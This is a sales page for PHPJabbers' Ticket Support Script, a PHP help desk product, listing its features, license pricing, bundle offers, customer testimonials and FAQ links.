Every company providing maintenance and post-sale support services needs a simple and reliable support ticket system to manage customer requests and issues. Integrate our smart help desk system into your website and keep your finger on the pulse of your customers' needs!

Smart Ticket Management

Handle multiple customer support and client requests. Process, edit, delete, and export tickets. Add tickets manually on behalf of clients.

Versatile & Responsive Design

The front-end UI of our help desk software is optimized for mobile devices. You can preview and enable 10 different color themes.

Canned Messages

Support members can use predefined messages in standard situations and thus improve turn-around time and quality.

Ticket Rating Tool

Clients can rate ticket replies they have received from the support team. They only need to click on the respective smiley or frownie.

Customer Panel

Clients can communicate with your staff, follow up and read ticket replies from a password-protected profile area on the front end.

Email Notifications

Notify clients as soon as their tickets have been processed. Send automatic emails to all departments upon each new ticket received.

Ticket Assignment

Clients can direct tickets to different departments through the online form. Team leaders can assign tickets to agents from the back end.

PHP Source Code Customization

If you buy the Developer License, you can make your own custom changes to the ticket support system, or ask us for a modification.

SPECIAL OFFER

**Ticket Support Script for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Ticket Support Script and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Ticket Support Script**

**Key Benefits**

High Performance

Key Features

Extended Licence

Installation Support

Remote Hosting

**Pricing**

You can buy the PHP ticketing system both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our support ticket system and how the script has improved their online business.

“

Hi PHPJabbers,  
It's not very often these days people let you know when you've done something right, on the contrary, they sure let you know when you've done something wrong.  
I would just like to show my appreciation by thanking you guy's for supplying me with a superb script that does exactly what it say's on the box. It looks good and works well.  
In addition to this you also backed it up with technical support that got it right first time, after I inadvertently entered some wrong information into the setup file.  
Once again, thank you for all your hard work.

Graham Clipson

“

Our small family business it's getting better each day thanks to PHPJabbers scripts. Outstanding customer support, clean and open source code is what every webmaster looking for. So don't look any further because you're on the right place. You will not only get the quality software, you will learn and benefit more than you know.  
Thanks once again! I'm looking forward for PHPJabbers' new solutions and right now I'm interested in a ticket support system so I will check it a little bit.

Bruno

“

That works perfectly!!! I couldn't be more happy. Thank you so much for doing a good job and making these PHP scripts so affordable. This is the 5th script I have bought from PHPJabbers and I continue to be the happiest of customers! I will buy more and continue to recommend you guys and your site PHPJabbers.com at all the web developer/design meetings I attend.

Matt Wechsler

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Ticket Support Script.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Knowledge Base Builder**

$19 / $29

**File Sharing Script**

$29 / $49

**PHP Contact Form Generator**

$19 / $29

**Callback Widget**

$19 / $29

**PHP Forum Script**

$19 / $29

**Document Creator**

$19 / $39

Tag

#php